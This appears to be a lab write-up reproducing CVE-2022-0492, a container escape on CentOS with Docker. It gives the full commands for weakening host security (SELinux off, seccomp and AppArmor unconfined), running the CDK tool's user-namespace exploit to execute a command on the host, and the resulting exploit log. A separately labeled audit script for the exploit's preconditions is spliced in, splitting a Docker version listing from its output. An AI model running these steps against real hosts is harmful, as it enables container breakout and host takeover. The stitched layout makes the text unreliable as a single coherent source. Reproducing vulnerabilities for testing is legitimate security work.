CentOS: reproducing CVE-2022-0492 (simple version)
1. Download the latest cdk release: https://github.com/cdk-team/CDK/releases
2. Build the image. The Dockerfile is as follows:
FROM ubuntu:20.04
LABEL MAINTAINER kmahyyg<16604643+kmahyyg@users.noreply.github.com>
RUN echo "nameserver 223.5.5.5" > /etc/resolv.conf
RUN sed -i 's/archive.ubuntu.com/mirrors.aliyun.com/g' /etc/apt/sources.list && \
apt update -y && \
apt install -y ca-certificates wget curl nano strace ltrace socat libcap2-bin && \
rm -rf /var/cache/apt
CMD ["/bin/bash", "-c", "sleep 9999"]
docker build -t rinchat/test:CVE-2022-0492 .
The image has already been pushed to the registry as rinchat/test:CVE-2022-0492, so you can simply pull it.
3. Temporarily disable SELinux:
setenforce 0
Enable user namespaces:
echo user.max_user_namespaces=15000 >/etc/sysctl.d/90-max_net_namespaces.conf
sysctl -p /etc/sysctl.d/90-max_net_namespaces.conf
Make sure the cdk binary is in the current directory.
4. Start the container (note that both the default seccomp and AppArmor profiles are explicitly disabled here):
docker run -d -v `pwd`:/test --security-opt "seccomp=unconfined" --security-opt "apparmor=unconfined" --name test rinchat/test:CVE-2022-0492
Enter the container with docker exec (for example `docker exec -it test bash`, then `cd /test`) and run: ./cdk run abuse-unpriv-userns "touch /root/hacked"
Check whether the file /root/hacked now exists on the host. If it does, the vulnerability is present: commands can be executed on the host from inside the container.
Log output when the host is vulnerable:
root@2de2c952ccf1:/test# ./cdk run abuse-unpriv-userns "touch /root/hacked"
2022/04/07 15:27:31 User-Defined Shell Payload: touch /root/hacked
2022/04/07 15:27:31 current cgroup for exploit: rdma
2022/04/07 15:27:31 user-defined shell payload is: touch /root/hacked
2022/04/07 15:27:31 Found hostpath: /var/lib/docker/overlay/648284107b18c61c6040f6f056307e4d7b8d55471af927b0581a5690d2e76f96/upper
2022/04/07 15:27:31 generate shell exploit with user-input cmd:
touch /root/hacked
final shell exploit is:
#!/bin/sh
touch /root/hacked > /var/lib/docker/overlay/648284107b18c61c6040f6f056307e4d7b8d55471af927b0581a5690d2e76f96/upper/cdk_cgres_XCXT
2022/04/07 15:27:31 shell script saved to /cdk_cgexp_XCXT.sh
2022/04/07 15:27:36 Execute Result:
Testing showed that kernels 4.11 and above have the bug.
Kernel download link: http://193.49.22.109/elrepo/kernel/el7/x86_64/RPMS/
Docker version:
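As an added defensive check that is not part of the original write-up: steps 3 and 4 set up three host-side preconditions (user namespaces enabled, seccomp and AppArmor disabled on the container, a cgroup v1 mount that exposes release_agent), and those are what an auditor should look for on a CentOS/Docker host. The script below takes each value as an argument so it can be dry-run offline; `audit_live`, the container name "test" and the verdict wording are my own assumptions.

```sh
#!/bin/sh
# Added audit helper, not part of the original write-up. It checks the three
# host-side conditions the reproduction relies on: unprivileged user namespaces
# enabled (step 3), seccomp/AppArmor disabled on the container (step 4), and a
# cgroup v1 mount (release_agent only exists in cgroup v1). Inputs are passed as
# arguments so the checks can be dry-run; audit_live reads them from the live host.
# EXPOSED means every precondition of this post's chain is met; a patched kernel
# remains the real fix regardless of the verdict.

# True when unprivileged user namespaces are allowed.
# $1 = value of user.max_user_namespaces (the post sets 15000; 0 disables them).
userns_allowed() {
  [ "${1:-0}" -gt 0 ]
}

# True when a container's SecurityOpt turns off seccomp or AppArmor, as the
# `--security-opt ...=unconfined` flags in step 4 do.
# $1 = output of: docker inspect -f '{{.HostConfig.SecurityOpt}}' <container>
securityopt_weak() {
  case "$1" in
    *seccomp=unconfined*|*apparmor=unconfined*) return 0 ;;
    *) return 1 ;;
  esac
}

# True when any cgroup v1 hierarchy is mounted (fstype is field 3 of a mounts line).
# $1 = contents of /proc/self/mounts
cgroup_v1_present() {
  printf '%s\n' "$1" | awk '$3 == "cgroup" { found = 1 } END { exit !found }'
}

# Print each finding, then a final line: EXPOSED (all three), PARTIAL (some) or OK.
# $1 = max_user_namespaces, $2 = SecurityOpt text, $3 = mounts text
verdict() {
  risk=0
  userns_allowed "$1"    && { echo "unprivileged user namespaces enabled"; risk=$((risk + 1)); }
  securityopt_weak "$2"  && { echo "seccomp/AppArmor unconfined on container"; risk=$((risk + 1)); }
  cgroup_v1_present "$3" && { echo "cgroup v1 mounted (release_agent reachable)"; risk=$((risk + 1)); }
  if [ "$risk" -eq 3 ]; then echo "EXPOSED"
  elif [ "$risk" -gt 0 ]; then echo "PARTIAL"
  else echo "OK"; fi
}

# Live wiring (assumed usage: sh audit.sh --live <container>); name defaults to "test".
audit_live() {
  verdict "$(sysctl -n user.max_user_namespaces)" \
          "$(docker inspect -f '{{.HostConfig.SecurityOpt}}' "${1:-test}")" \
          "$(cat /proc/self/mounts)"
}
if [ "${1:-}" = "--live" ]; then audit_live "${2:-}"; fi
```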
[root@localhost ~]# docker version
Client: Docker Engine - Community
Version: 20.10.0
API version: 1.41
Go version: go1.13.15
Git commit: 7287ab3
Built: Tue Dec 8 18:54:00 2020
OS/Arch: linux/amd64
Context: default
Experimental: true
Server: Docker Engine - Community
Engine:
Version: 20.10.0
API version: 1.41 (minimum version 1.12)
Go version: go1.13.15
Git commit: eeddea2
Built: Tue Dec 8 18:58:04 2020
OS/Arch: linux/amd64
Experimental: false
containerd:
Version: v1.4.3
GitCommit: 269548fa27e0089a8b8278fc4fc781d7f65a939b
runc:
Version: 1.0.0-rc92
GitCommit: ff819c7e9184c13b7c2607fe6c30ae19403a7aff
docker-init:
Version: 0.19.0
GitCommit: de40ad0